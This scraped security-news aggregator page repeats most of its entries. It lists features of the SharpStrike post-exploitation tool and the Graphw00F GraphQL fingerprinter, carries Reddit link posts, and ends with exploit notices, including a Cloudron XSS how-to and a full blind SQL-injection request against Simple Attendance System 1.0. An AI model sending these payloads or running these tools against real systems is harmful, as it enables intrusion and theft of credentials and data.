Hacking Articles Tips Tricks Videos Tutorials
Kali Linux TutorialsSharpStrike : A Post Exploitation Tool Written In C# Uses Either CIM Or WMI To Query Remote Systems SharpStrike is a post-exploitation tool written in C# that uses either CIM or WMI to query remote systems. It can use provided credentials…
rations
process_kill – Kill a process via name or process id on the targeted machine
process_start – Start a process on the targeted machine
ps – Process listing
System Operations
active_users – List domain users with active processes on the targeted system
basic_info – Used to enumerate basic metadata about the targeted system
drive_list – List local and network drives
share_list – List network shares
ifconfig – Receive IP info from NICs with active network connections
installed_programs – Receive a list of the installed programs on the targeted machine
logoff – Log users off the targeted machine
reboot (or restart) – Reboot the targeted machine
power_off (or shutdown) – Power off the targeted machine
vacant_system – Determine if a user is away from the system
edr_query – Query the local or remote system for EDR vendors
Log Operations
logon_events – Identify users that have logged onto a system
All PowerShell can be disabled by using the –nops flag, although some commands will not execute (upload/download, enable/disable WinRM)
** Denotes PowerShell usage (either using a PowerShell Runspace or through Win32_Process::Create method)
*** Denotes LDAP usage – “root\directory\ldap” namespace
Solution Architecture
SharpStrike is composed of three main projects
* ServiceLayer — Provides core functionality and consumed by the UI layer
* Models — Contains types, shared across all projects
* User Interface — GUI/Console
ServiceLayer
* Connector.cs
This is where the initial CIM/WMI connections are made and passed to the rest of the application
* ExecuteWMI.cs
All function code for the WMI commands
* ExecuteCIM.cs
All function code for the CIM (MI) commands
Download
process_kill – Kill a process via name or process id on the targeted machine
process_start – Start a process on the targeted machine
ps – Process listing
System Operations
active_users – List domain users with active processes on the targeted system
basic_info – Used to enumerate basic metadata about the targeted system
drive_list – List local and network drives
share_list – List network shares
ifconfig – Receive IP info from NICs with active network connections
installed_programs – Receive a list of the installed programs on the targeted machine
logoff – Log users off the targeted machine
reboot (or restart) – Reboot the targeted machine
power_off (or shutdown) – Power off the targeted machine
vacant_system – Determine if a user is away from the system
edr_query – Query the local or remote system for EDR vendors
Log Operations
logon_events – Identify users that have logged onto a system
All PowerShell can be disabled by using the –nops flag, although some commands will not execute (upload/download, enable/disable WinRM)
** Denotes PowerShell usage (either using a PowerShell Runspace or through Win32_Process::Create method)
*** Denotes LDAP usage – “root\directory\ldap” namespace
Solution Architecture
SharpStrike is composed of three main projects
* ServiceLayer — Provides core functionality and consumed by the UI layer
* Models — Contains types, shared across all projects
* User Interface — GUI/Console
ServiceLayer
* Connector.cs
This is where the initial CIM/WMI connections are made and passed to the rest of the application
* ExecuteWMI.cs
All function code for the WMI commands
* ExecuteCIM.cs
All function code for the CIM (MI) commands
Download
Hacking Articles Tips Tricks Videos Tutorials
Photo
Hacking Articles Tips Tricks Videos Tutorials
Photo
hacking: security in practice
What happened when I found I 40-year-old program and realized it was something I wrote.
https://external-preview.redd.it/niEBGiBDN8yLjr-mqvhvFgTLy6evbPkpeFxyXm8mi_0.jpg?width=640&crop=smart&auto=webp&s=bfff81dbd3b55770c71c60883e8550b555f77da6 submitted by /u/mad_ned
[link] [comments]
What happened when I found I 40-year-old program and realized it was something I wrote.
https://external-preview.redd.it/niEBGiBDN8yLjr-mqvhvFgTLy6evbPkpeFxyXm8mi_0.jpg?width=640&crop=smart&auto=webp&s=bfff81dbd3b55770c71c60883e8550b555f77da6 submitted by /u/mad_ned
[link] [comments]
Hacking Articles Tips Tricks Videos Tutorials
Photo
hacking: security in practice
High-Severity RCE Vulnerability Found in Several Netgear Routers
https://external-preview.redd.it/VYsrwupb3q1HSXHAxVpxzKyiXrWQDV_oqyzEK3kLS-Y.jpg?width=640&crop=smart&auto=webp&s=6ea3a939018f4ab2427d7285f0e047027212be47 submitted by /u/george-alexander2k
[link] [comments]
High-Severity RCE Vulnerability Found in Several Netgear Routers
https://external-preview.redd.it/VYsrwupb3q1HSXHAxVpxzKyiXrWQDV_oqyzEK3kLS-Y.jpg?width=640&crop=smart&auto=webp&s=6ea3a939018f4ab2427d7285f0e047027212be47 submitted by /u/george-alexander2k
[link] [comments]
AWS WAF analysis: How it works and how to attack it
https://thexssrat.medium.com/aws-waf-analysis-how-it-works-and-how-to-attack-it-8a456e561c74?source=rss------bug_bounty-5
https://thexssrat.medium.com/aws-waf-analysis-how-it-works-and-how-to-attack-it-8a456e561c74?source=rss------bug_bounty-5
Deep Web
Booting TAILS using a HP v212w Flash Drive USB Stick (2.0 USB)
Hello, I'm new....
I've recently brought myself a HP v212w Flash Drive USB Stick and I'm tempted of using it specifically for booting TAILS onto my laptop only and I was wondering whether this specific USB stick would work for this intended use.
The reason on why I am asking this is because on the DNM Bible it states that some USBs are problematic for booting TAILS and provides a list but I can't access that list because the DNM subreddit was banned.
submitted by /u/7Leviathan7
[link] [comments]
Booting TAILS using a HP v212w Flash Drive USB Stick (2.0 USB)
Hello, I'm new....
I've recently brought myself a HP v212w Flash Drive USB Stick and I'm tempted of using it specifically for booting TAILS onto my laptop only and I was wondering whether this specific USB stick would work for this intended use.
The reason on why I am asking this is because on the DNM Bible it states that some USBs are problematic for booting TAILS and provides a list but I can't access that list because the DNM subreddit was banned.
submitted by /u/7Leviathan7
[link] [comments]
reddit
Booting TAILS using a HP v212w Flash Drive USB Stick (2.0 USB)
Hello, I'm new.... I've recently brought myself a HP v212w Flash Drive USB Stick and I'm tempted of using it specifically for booting TAILS onto...
Hacking Articles Tips Tricks Videos Tutorials
Photo
Kali Linux TutorialsGraphw00F : GraphQL fingerprinting tool for GQL endpoints
Graphw00F (inspired by wafw00f) is the GraphQL fingerprinting tool for GQL endpoints, it sends a mix of benign and malformed queries to determine the GraphQL engine running behind the scenes. graphw00f will provide insights into what security defences each technology provides out of the box, and whether they are on or off by default.
Specially crafted queries cause different GraphQL server implementations to respond uniquely to queries, mutations and subscriptions, this makes it trivial to fingerprint the backend engine and distinguish between the various GraphQL implementations. (CWE: CWE-200)
Detections
graphw00f currently attempts to discover the following GraphQL engines:
* Graphene – Python
* Ariadne – Python
* Apollo – TypeScript
* graphql-go – Go
* gqlgen – Go
* WPGraphQL – PHP
* GraphQL API for WordPress – PHP
* Ruby – GraphQL
* graphql-php – PHP
* Hasura – Haskell
* HyperGraphQL – Java
* graphql-java – Java
* Juniper – Rust
* Sangria – Scala
* Flutter – Dart
* Diana.jl – Julia
* Strawberry – Python
* Tartiflette – Python
GraphQL Technologies Defence Matrices
Each fingerprinted technology (e.g. Graphene, Ariadne, …) has an associated document (example for graphene) which covers the security defence mechanisms the specific technology supports to give a better idea how the implementation may be attacked.
Field SuggestionsQuery Depth LimitQuery Cost AnalysisAutomatic Persisted QueriesIntrospectionDebug ModeBatch RequestsOn by DefaultNo SupportNo SupportNo SupportEnabled by DefaultN/AOff by Default
Prerequisites
* python3
* requests
Installation
Clone Repository
git clone git@github.com:dolevf/graphw00f.git
Run graphw00f
python3 main.py -h
Usage: main.py -h
Options:
-h, –help show this help message and exit
-r, –noredirect Do not follow redirections given by 3xx responses
-t URL, –target=URL target url with the path
-o OUTPUT_FILE, –output-file=OUTPUT_FILE
Output results to a file (CSV)
-l, –list List all GraphQL technologies graphw00f is able to
detect
-v, –version Print out the current version and exit.
Example
python3 main.py -t http://127.0.0.1:5000/graphql
+——————-+
| graphw00f |
+——————-+
*** ***
** ***
** **
+————–+ +————–+
| Node X | | Node Y |
+————–+ +————–+
*** ***
** **
** **
+————+
| Node Z |
+————+
graphw00f – v1.0.0
The fingerprinting tool for GraphQL
[] Checking if GraphQL is available at https://demo.hypergraphql.org:8484/graphql… [] Found GraphQL…
[] Attempting to fingerprint… [] Discovered GraphQL Engine: (HyperGraphQL)
[!] Attack Surface Matrix: https://github.com/dolevf/graphw00f/blob/main/docs/hypergraphql.md
[!] Technologies: Java
[!] Homepage: https://www.hypergraphql.org
[*] Completed.
Download
Graphw00F (inspired by wafw00f) is the GraphQL fingerprinting tool for GQL endpoints, it sends a mix of benign and malformed queries to determine the GraphQL engine running behind the scenes. graphw00f will provide insights into what security defences each technology provides out of the box, and whether they are on or off by default.
Specially crafted queries cause different GraphQL server implementations to respond uniquely to queries, mutations and subscriptions, this makes it trivial to fingerprint the backend engine and distinguish between the various GraphQL implementations. (CWE: CWE-200)
Detections
graphw00f currently attempts to discover the following GraphQL engines:
* Graphene – Python
* Ariadne – Python
* Apollo – TypeScript
* graphql-go – Go
* gqlgen – Go
* WPGraphQL – PHP
* GraphQL API for WordPress – PHP
* Ruby – GraphQL
* graphql-php – PHP
* Hasura – Haskell
* HyperGraphQL – Java
* graphql-java – Java
* Juniper – Rust
* Sangria – Scala
* Flutter – Dart
* Diana.jl – Julia
* Strawberry – Python
* Tartiflette – Python
GraphQL Technologies Defence Matrices
Each fingerprinted technology (e.g. Graphene, Ariadne, …) has an associated document (example for graphene) which covers the security defence mechanisms the specific technology supports to give a better idea how the implementation may be attacked.
Field SuggestionsQuery Depth LimitQuery Cost AnalysisAutomatic Persisted QueriesIntrospectionDebug ModeBatch RequestsOn by DefaultNo SupportNo SupportNo SupportEnabled by DefaultN/AOff by Default
Prerequisites
* python3
* requests
Installation
Clone Repository
git clone git@github.com:dolevf/graphw00f.git
Run graphw00f
python3 main.py -h
Usage: main.py -h
Options:
-h, –help show this help message and exit
-r, –noredirect Do not follow redirections given by 3xx responses
-t URL, –target=URL target url with the path
-o OUTPUT_FILE, –output-file=OUTPUT_FILE
Output results to a file (CSV)
-l, –list List all GraphQL technologies graphw00f is able to
detect
-v, –version Print out the current version and exit.
Example
python3 main.py -t http://127.0.0.1:5000/graphql
+——————-+
| graphw00f |
+——————-+
*** ***
** ***
** **
+————–+ +————–+
| Node X | | Node Y |
+————–+ +————–+
*** ***
** **
** **
+————+
| Node Z |
+————+
graphw00f – v1.0.0
The fingerprinting tool for GraphQL
[] Checking if GraphQL is available at https://demo.hypergraphql.org:8484/graphql… [] Found GraphQL…
[] Attempting to fingerprint… [] Discovered GraphQL Engine: (HyperGraphQL)
[!] Attack Surface Matrix: https://github.com/dolevf/graphw00f/blob/main/docs/hypergraphql.md
[!] Technologies: Java
[!] Homepage: https://www.hypergraphql.org
[*] Completed.
Download
Exploit Collector
Cloudron 6.2 Cross Site Scripting
Cloudron version 6.2 suffers from a cross site scripting vulnerability.
MD5 |
Download
Source:packetstormsecurity.com
Cloudron 6.2 Cross Site Scripting
Cloudron version 6.2 suffers from a cross site scripting vulnerability.
MD5 |
04e5263b2aba1564e3b29ea91dd03411Download
# Exploit Title: Cloudron 6.2 - 'returnTo ' Cross Site Scripting (Reflected)
# Date: 10.06.2021
# Exploit Author: Akıner Kısa
# Vendor Homepage: https://cloudron.io
# Software Link: https://www.cloudron.io/get.html
# Version: 6.3 >
# CVE : CVE-2021-40868
Proof of Concept:
1. Go to https://localhost/login.html?returnTo=
2. Type your payload after returnTo=
3. Fill in the login information and press the sign in button.
Source:packetstormsecurity.com
Hacking Articles Tips Tricks Videos Tutorials
Photo
Exploit CollectorSimple Attendance System 1.0 SQL Injection
Simple Attendance System version 1.0 suffers from a remote SQL injection vulnerability.
MD5 |
Download
Source:packetstormsecurity.com
Simple Attendance System version 1.0 suffers from a remote SQL injection vulnerability.
MD5 |
62a8cbbf17593175cd123e2b14cd74efDownload
# Exploit Title: Simple Attendance System 1.0 - Unauthenticated Blind SQLi
# Exploit Author: ()t/\/\1
# Date: September 21, 2021
# Vendor Homepage: https://www.sourcecodester.com/php/14948/simple-attendance-system-php-and-sqlite-free-source-code.html
# Tested on: Linux
# Version: v1.0
# Exploit Description:
The application suffers from an unauthenticated SQL Injection vulnerability.Input passed through 'employee_code' POST parameter in 'http://127.0.0.1//attendance/Actions.php?a=save_attendance' is not properly sanitised before being returned to the user or used in SQL queries. This can be exploited to manipulate SQL queries by injecting arbitrary SQL code and retrieve sensitive data.
# PoC request
POST /attendance/Actions.php?a=save_attendance HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://127.0.0.1/attendance/attendance.php
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 138
Connection: close
Cookie: PHPSESSID=11c4e96bb334b51540f4758e9d33885d
employee_code=2d'+OR+SUBSTR((select+user_id+from+user_list+where+username="admin"),1,1)="1"--&att_type_id=1&date_created=&att_type=Time+In
Source:packetstormsecurity.com